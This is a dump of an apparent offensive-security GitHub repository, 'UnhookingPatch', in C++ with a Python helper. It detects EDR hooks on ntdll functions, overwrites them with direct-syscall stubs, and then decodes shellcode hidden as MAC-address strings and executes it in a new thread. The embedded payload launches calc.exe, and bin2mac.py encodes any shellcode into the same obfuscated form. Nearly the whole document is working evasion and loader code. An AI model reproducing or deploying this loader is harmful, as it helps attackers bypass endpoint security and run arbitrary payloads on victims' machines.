├── calc.bin
├── PatchingAPI
    ├── PatchingAPI.vcxproj.user
    ├── PatchingAPI.vcxproj.filters
    ├── PatchingAPI.sln
    ├── PatchingAPI.vcxproj
    └── PatchingAPI.cpp
├── README.md
├── bin2mac.py
└── LICENSE


/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/UnhookingPatch/HEAD/calc.bin


--------------------------------------------------------------------------------
/PatchingAPI/PatchingAPI.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # UnhookingPatch
 2 | Bypass EDR Hooks by patching NT API stub, and resolving SSNs and syscall instructions at runtime
 3 | 
 4 | ![image](https://raw.githubusercontent.com/illegal-instruction-co/UnhookingPatch/main/assets/view.jpg)
 5 | 
 6 | 
 7 | ## How do i convert binary to MAC ?
 8 | 
 9 | Requirements: 
10 | 1. macaddress
11 | 
12 | ```
13 | pip install macaddress
14 | ./bin2mac.py calc.bin
15 | ```
16 | 
17 | 


--------------------------------------------------------------------------------
/bin2mac.py:
--------------------------------------------------------------------------------
 1 | from macaddress import MAC
 2 | import sys
 3 | 
 4 | if len(sys.argv) < 2:
 5 |     print("Usage: %s <shellcode_file>" % sys.argv[0])
 6 |     sys.exit(1) 
 7 | 
 8 | with open(sys.argv[1], "rb") as f:
 9 |     chunk = f.read(6)
10 |     print("{}const char* MAC[] =".format(' '*4))
11 |     print("    {")
12 |     while chunk:
13 |         if len(chunk) < 6:
14 |             padding = 6 - len(chunk)
15 |             chunk = chunk + (b"\x90" * padding)
16 |             print("{}\"{}\"".format(' '*8,MAC(chunk)))
17 |             break
18 |         print("{}\"{}\",".format(' '*8,MAC(chunk)))
19 |         chunk = f.read(6)
20 |     print("    };")
21 | 


--------------------------------------------------------------------------------
/PatchingAPI/PatchingAPI.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="PatchingAPI.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 SAAD AHLA
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/PatchingAPI/PatchingAPI.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.32106.194
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PatchingAPI", "PatchingAPI.vcxproj", "{81E60DC6-694E-4F51-88FA-6F481B9A4208}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Debug|x64.Build.0 = Debug|x64
18 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Debug|x86.Build.0 = Debug|Win32
20 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Release|x64.ActiveCfg = Release|x64
21 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Release|x64.Build.0 = Release|x64
22 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Release|x86.ActiveCfg = Release|Win32
23 | 		{81E60DC6-694E-4F51-88FA-6F481B9A4208}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {C4C56CBC-05A3-4229-8BCC-D84AB88A8268}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/PatchingAPI/PatchingAPI.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{81e60dc6-694e-4f51-88fa-6f481b9a4208}</ProjectGuid>
 25 |     <RootNamespace>PatchingAPI</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="PatchingAPI.cpp" />
143 |   </ItemGroup>
144 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
145 |   <ImportGroup Label="ExtensionTargets">
146 |   </ImportGroup>
147 | </Project>


--------------------------------------------------------------------------------
/PatchingAPI/PatchingAPI.cpp:
--------------------------------------------------------------------------------
  1 | #include <Windows.h>
  2 | #include <stdio.h>
  3 | #include <Rpc.h>
  4 | #include <winternl.h>
  5 | #include <Ip2string.h>
  6 | #pragma comment(lib, "ntdll")
  7 | 
  8 | #define NtCurrentProcess()	   ((HANDLE)-1)
  9 | 
 10 | #define _CRT_SECURE_NO_WARNINGS
 11 | #pragma warning(disable:4996)
 12 | 
 13 | #pragma comment(lib, "Rpcrt4.lib")
 14 | 
 15 | #ifndef NT_SUCCESS
 16 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
 17 | #endif
 18 | 
 19 | #define UP -32
 20 | #define DOWN 32
 21 | 
 22 | 
 23 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
 24 |     HANDLE    ProcessHandle,
 25 |     PVOID* BaseAddress,
 26 |     ULONG_PTR ZeroBits,
 27 |     PSIZE_T   RegionSize,
 28 |     ULONG     AllocationType,
 29 |     ULONG     Protect
 30 | );
 31 | 
 32 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
 33 |     IN HANDLE ProcessHandle,
 34 |     IN OUT PVOID* BaseAddress,
 35 |     IN OUT PSIZE_T RegionSize,
 36 |     IN ULONG NewProtect,
 37 |     OUT PULONG OldProtect);
 38 | 
 39 | 
 40 | 
 41 | EXTERN_C NTSTATUS NtCreateThreadEx(
 42 |     OUT PHANDLE hThread,
 43 |     IN ACCESS_MASK DesiredAccess,
 44 |     IN PVOID ObjectAttributes,
 45 |     IN HANDLE ProcessHandle,
 46 |     IN PVOID lpStartAddress,
 47 |     IN PVOID lpParameter,
 48 |     IN ULONG Flags,
 49 |     IN SIZE_T StackZeroBits,
 50 |     IN SIZE_T SizeOfStackCommit,
 51 |     IN SIZE_T SizeOfStackReserve,
 52 |     OUT PVOID lpBytesBuffer
 53 | );
 54 | 
 55 | EXTERN_C NTSTATUS NtWaitForSingleObject(
 56 |     IN HANDLE         Handle,
 57 |     IN BOOLEAN        Alertable,
 58 |     IN PLARGE_INTEGER Timeout
 59 | );
 60 | 
 61 | 
 62 | struct LDR_MODULE {
 63 |     LIST_ENTRY e[3];
 64 |     HMODULE base;
 65 |     void* entry;
 66 |     UINT size;
 67 |     UNICODE_STRING dllPath;
 68 |     UNICODE_STRING dllname;
 69 | };
 70 | 
 71 | 
 72 | 
 73 | BOOL isItHooked(LPVOID addr) {
 74 |     BYTE stub[] = "\x4c\x8b\xd1\xb8";
 75 |     if (memcmp(addr, stub, 4) != 0) 
 76 |         return TRUE;
 77 |     return FALSE;
 78 | }
 79 | 
 80 | 
 81 | WORD GetsyscallNum(LPVOID addr) {
 82 | 
 83 | 
 84 |     WORD syscall = NULL;
 85 | 
 86 |     if (*((PBYTE)addr) == 0x4c
 87 |         && *((PBYTE)addr + 1) == 0x8b
 88 |         && *((PBYTE)addr + 2) == 0xd1
 89 |         && *((PBYTE)addr + 3) == 0xb8
 90 |         && *((PBYTE)addr + 6) == 0x00
 91 |         && *((PBYTE)addr + 7) == 0x00) {
 92 | 
 93 |         BYTE high = *((PBYTE)addr + 5);
 94 |         BYTE low = *((PBYTE)addr + 4);
 95 |         syscall = (high << 8) | low;
 96 | 
 97 |         return syscall;
 98 | 
 99 |     }
100 | 
101 |     if (*((PBYTE)addr) == 0xe9 || *((PBYTE)addr + 3) == 0xe9 || *((PBYTE)addr + 8) == 0xe9 ||
102 |         *((PBYTE)addr + 10) == 0xe9 || *((PBYTE)addr + 12) == 0xe9) {
103 | 
104 |         for (WORD idx = 1; idx <= 500; idx++) {
105 |             if (*((PBYTE)addr + idx * DOWN) == 0x4c
106 |                 && *((PBYTE)addr + 1 + idx * DOWN) == 0x8b
107 |                 && *((PBYTE)addr + 2 + idx * DOWN) == 0xd1
108 |                 && *((PBYTE)addr + 3 + idx * DOWN) == 0xb8
109 |                 && *((PBYTE)addr + 6 + idx * DOWN) == 0x00
110 |                 && *((PBYTE)addr + 7 + idx * DOWN) == 0x00) {
111 |                 BYTE high = *((PBYTE)addr + 5 + idx * DOWN);
112 |                 BYTE low = *((PBYTE)addr + 4 + idx * DOWN);
113 |                 syscall = (high << 8) | low - idx;
114 | 
115 |                 return syscall;
116 |             }
117 |             if (*((PBYTE)addr + idx * UP) == 0x4c
118 |                 && *((PBYTE)addr + 1 + idx * UP) == 0x8b
119 |                 && *((PBYTE)addr + 2 + idx * UP) == 0xd1
120 |                 && *((PBYTE)addr + 3 + idx * UP) == 0xb8
121 |                 && *((PBYTE)addr + 6 + idx * UP) == 0x00
122 |                 && *((PBYTE)addr + 7 + idx * UP) == 0x00) {
123 |                 BYTE high = *((PBYTE)addr + 5 + idx * UP);
124 |                 BYTE low = *((PBYTE)addr + 4 + idx * UP);
125 | 
126 |                 syscall = (high << 8) | low + idx;
127 | 
128 |                 return syscall;
129 | 
130 |             }
131 | 
132 |         }
133 | 
134 |     }
135 | }
136 | 
137 | DWORD64 GetsyscallInstr(LPVOID addr) {
138 | 
139 | 
140 |     WORD syscall = NULL;
141 | 
142 |     if (*((PBYTE)addr) == 0x4c
143 |         && *((PBYTE)addr + 1) == 0x8b
144 |         && *((PBYTE)addr + 2) == 0xd1
145 |         && *((PBYTE)addr + 3) == 0xb8
146 |         && *((PBYTE)addr + 6) == 0x00
147 |         && *((PBYTE)addr + 7) == 0x00) {
148 | 
149 |         return (INT_PTR)addr + 0x12;    // syscall
150 | 
151 |     }
152 | 
153 |     if (*((PBYTE)addr) == 0xe9 || *((PBYTE)addr + 3) == 0xe9 || *((PBYTE)addr + 8) == 0xe9 ||
154 |         *((PBYTE)addr + 10) == 0xe9 || *((PBYTE)addr + 12) == 0xe9) {
155 | 
156 |         for (WORD idx = 1; idx <= 500; idx++) {
157 |             if (*((PBYTE)addr + idx * DOWN) == 0x4c
158 |                 && *((PBYTE)addr + 1 + idx * DOWN) == 0x8b
159 |                 && *((PBYTE)addr + 2 + idx * DOWN) == 0xd1
160 |                 && *((PBYTE)addr + 3 + idx * DOWN) == 0xb8
161 |                 && *((PBYTE)addr + 6 + idx * DOWN) == 0x00
162 |                 && *((PBYTE)addr + 7 + idx * DOWN) == 0x00) {
163 | 
164 |                 return (INT_PTR)addr + 0x12;
165 |             }
166 |             if (*((PBYTE)addr + idx * UP) == 0x4c
167 |                 && *((PBYTE)addr + 1 + idx * UP) == 0x8b
168 |                 && *((PBYTE)addr + 2 + idx * UP) == 0xd1
169 |                 && *((PBYTE)addr + 3 + idx * UP) == 0xb8
170 |                 && *((PBYTE)addr + 6 + idx * UP) == 0x00
171 |                 && *((PBYTE)addr + 7 + idx * UP) == 0x00) {
172 | 
173 |                 return (INT_PTR)addr + 0x12;
174 | 
175 |             }
176 | 
177 |         }
178 | 
179 |     }
180 | 
181 | }
182 | 
183 | 
184 | BOOL UnhookPatch(LPVOID addr) {
185 | 
186 |     DWORD oldprotect = 0;
187 |    
188 |     BYTE syscallNum = GetsyscallNum(addr);
189 |     DWORD64 syscallInst = GetsyscallInstr(addr);
190 |     
191 |     // mov     r10, rcx        
192 |     // mov     eax, SSN
193 |     // syscall
194 |     // retn
195 | 
196 |     BYTE patch[] = { 0x49, 0x89, 0xCA, 0xB8, 0xBC, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3, 0x90, 0x90, 0x90, 0x90 };
197 | 
198 |     // syscall
199 |     patch[4] = syscallNum;
200 | 
201 |     // syscall instruction
202 |     patch[8] = *(BYTE*)syscallInst;
203 |     patch[9] = *(BYTE*)(syscallInst + 0x1);
204 | 
205 |     BOOL status1 = VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
206 |     if (!status1) {
207 |         printf("Failed in changing protection (%u)\n", GetLastError());
208 |         return FALSE;
209 |     }
210 | 
211 |     memcpy(addr, patch, sizeof(patch));
212 | 
213 | 
214 |     BOOL status2 = VirtualProtect(addr, 4096, oldprotect, &oldprotect);
215 |     if (!status2) {
216 |         printf("Failed in changing protection back (%u)\n", GetLastError());
217 |         return FALSE;
218 |     }
219 |     return TRUE;
220 | }
221 | 
222 | int main() {
223 | 
224 |    
225 | 
226 |     PVOID BaseAddress = NULL;
227 |     SIZE_T dwSize = 0x2000;
228 | 
229 |     
230 |     const char* MAC[] =
231 |     {
232 |         "FC-48-83-E4-F0-E8",
233 |         "C0-00-00-00-41-51",
234 |         "41-50-52-51-56-48",
235 |         "31-D2-65-48-8B-52",
236 |         "60-48-8B-52-18-48",
237 |         "8B-52-20-48-8B-72",
238 |         "50-48-0F-B7-4A-4A",
239 |         "4D-31-C9-48-31-C0",
240 |         "AC-3C-61-7C-02-2C",
241 |         "20-41-C1-C9-0D-41",
242 |         "01-C1-E2-ED-52-41",
243 |         "51-48-8B-52-20-8B",
244 |         "42-3C-48-01-D0-8B",
245 |         "80-88-00-00-00-48",
246 |         "85-C0-74-67-48-01",
247 |         "D0-50-8B-48-18-44",
248 |         "8B-40-20-49-01-D0",
249 |         "E3-56-48-FF-C9-41",
250 |         "8B-34-88-48-01-D6",
251 |         "4D-31-C9-48-31-C0",
252 |         "AC-41-C1-C9-0D-41",
253 |         "01-C1-38-E0-75-F1",
254 |         "4C-03-4C-24-08-45",
255 |         "39-D1-75-D8-58-44",
256 |         "8B-40-24-49-01-D0",
257 |         "66-41-8B-0C-48-44",
258 |         "8B-40-1C-49-01-D0",
259 |         "41-8B-04-88-48-01",
260 |         "D0-41-58-41-58-5E",
261 |         "59-5A-41-58-41-59",
262 |         "41-5A-48-83-EC-20",
263 |         "41-52-FF-E0-58-41",
264 |         "59-5A-48-8B-12-E9",
265 |         "57-FF-FF-FF-5D-48",
266 |         "BA-01-00-00-00-00",
267 |         "00-00-00-48-8D-8D",
268 |         "01-01-00-00-41-BA",
269 |         "31-8B-6F-87-FF-D5",
270 |         "BB-E0-1D-2A-0A-41",
271 |         "BA-A6-95-BD-9D-FF",
272 |         "D5-48-83-C4-28-3C",
273 |         "06-7C-0A-80-FB-E0",
274 |         "75-05-BB-47-13-72",
275 |         "6F-6A-00-59-41-89",
276 |         "DA-FF-D5-63-61-6C",
277 |         "63-2E-65-78-65-00",
278 |     };
279 | 
280 | 
281 |     const char ntdll[] = { 'n','t','d','l','l','.','d','l','l', 0 };
282 |     const char NtAlloc[] = { 'N','t','A','l','l','o','c','a','t','e','V','i','r','t','u','a','l','M','e','m','o','r','y', 0 };
283 | 
284 |     LPVOID pNtAlloc = GetProcAddress(GetModuleHandleA(ntdll), NtAlloc);
285 | 
286 | 
287 |     if (isItHooked(pNtAlloc)) {
288 |         printf("[-] NtAllocateVirtualMemory Hooked\n");
289 |         if (!UnhookPatch(pNtAlloc)) {
290 |             printf("Failed in Unhooking NtCreateThreadEx\n");
291 |         }
292 |         printf("\t[+] NtCreateThreadEx UnHooked\n");
293 | 
294 |     }
295 |     else {
296 |         printf("[+] NtAllocateVirtualMemory Not Hooked\n");
297 |     }
298 |     
299 | 
300 | 
301 | 
302 |     NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
303 |     if (!NT_SUCCESS(status1)) {
304 |         printf("[!] Failed in NtAllocateVirtualMemory (%u)\n", GetLastError());
305 |         return 1;
306 |     }
307 | 
308 | 
309 |     int rowLen = sizeof(MAC) / sizeof(MAC[0]);
310 |     PCSTR Terminator = NULL;
311 |     NTSTATUS STATUS;
312 | 
313 |     DWORD_PTR ptr = (DWORD_PTR)BaseAddress;
314 |     for (int i = 0; i < rowLen; i++) {
315 |         STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);
316 |         if (!NT_SUCCESS(STATUS)) {
317 |             return FALSE;
318 |         }
319 |         ptr += 6;
320 | 
321 |     }
322 | 
323 |     HANDLE hThread;
324 |     DWORD OldProtect = 0;
325 | 
326 | 
327 |     const char NtProtect[] = { 'N','t','P','r','o','t','e','c','t','V','i','r','t','u','a','l','M','e','m','o','r','y', 0 };
328 | 
329 |     LPVOID pNtProtect = GetProcAddress(GetModuleHandleA(ntdll), NtProtect);
330 | 
331 |     if (isItHooked(pNtProtect)) {
332 |         printf("[-] NtProtectVirtualMemory Hooked\n");
333 |         if (!UnhookPatch(pNtProtect)) {
334 |             printf("Failed in Unhooking NtCreateThreadEx\n");
335 |         }
336 |         printf("\t[+] NtCreateThreadEx UnHooked\n");
337 |     }
338 |     else {
339 |         printf("[+] NtProtectVirtualMemory Not Hooked\n");
340 |     }
341 |     
342 | 
343 |     NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);
344 |     if (!NT_SUCCESS(NtProtectStatus1)) {
345 |         printf("[!] Failed in sysNtProtectVirtualMemory1 (%u)\n", GetLastError());
346 |         return 2;
347 |     }
348 | 
349 | 
350 |     HANDLE hHostThread = INVALID_HANDLE_VALUE;
351 | 
352 |     const char NtCreateTh[] = { 'N','t','C','r','e','a','t','e','T','h','r','e','a','d','E','x', 0 };
353 | 
354 | 
355 | 
356 |     LPVOID pNtCreateThreadEx = GetProcAddress(GetModuleHandleA(ntdll), NtCreateTh);
357 |     if (isItHooked(pNtCreateThreadEx)) {
358 |         printf("[-] NtCreateThreadEx Hooked\n");
359 |         if (!UnhookPatch(pNtCreateThreadEx)) {
360 |             printf("Failed in Unhooking NtCreateThreadEx\n");
361 |         }
362 |         printf("\t[+] NtCreateThreadEx UnHooked\n");
363 |         
364 |     }
365 |     else {
366 |         printf("[+] NtCreateThreadEx Not Hooked\n");
367 |     }
368 | 
369 | 
370 |     NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
371 |     if (!NT_SUCCESS(NtCreateThreadstatus)) {
372 |         printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
373 |         return 3;
374 |     }
375 | 
376 | 
377 | 
378 |     LARGE_INTEGER Timeout;
379 |     Timeout.QuadPart = -10000000;
380 | 
381 | 
382 |     
383 |     const char NtWait[] = { 'N','t','W','a','i','t','F','o','r','S','i','n','g','l','e','O','b','j','e','c','t', 0 };
384 | 
385 |     LPVOID pNtWait = GetProcAddress(GetModuleHandleA(ntdll), NtWait);
386 | 
387 |     if (isItHooked(pNtWait)) {
388 |         printf("[-] NtWaitForSingleObject Hooked\n");
389 |         if (!UnhookPatch(pNtWait)) {
390 |             printf("Failed in Unhooking NtWaitForSingleObject\n");
391 |         }
392 |         printf("\t[+] NtWaitForSingleObject UnHooked\n");
393 |     }
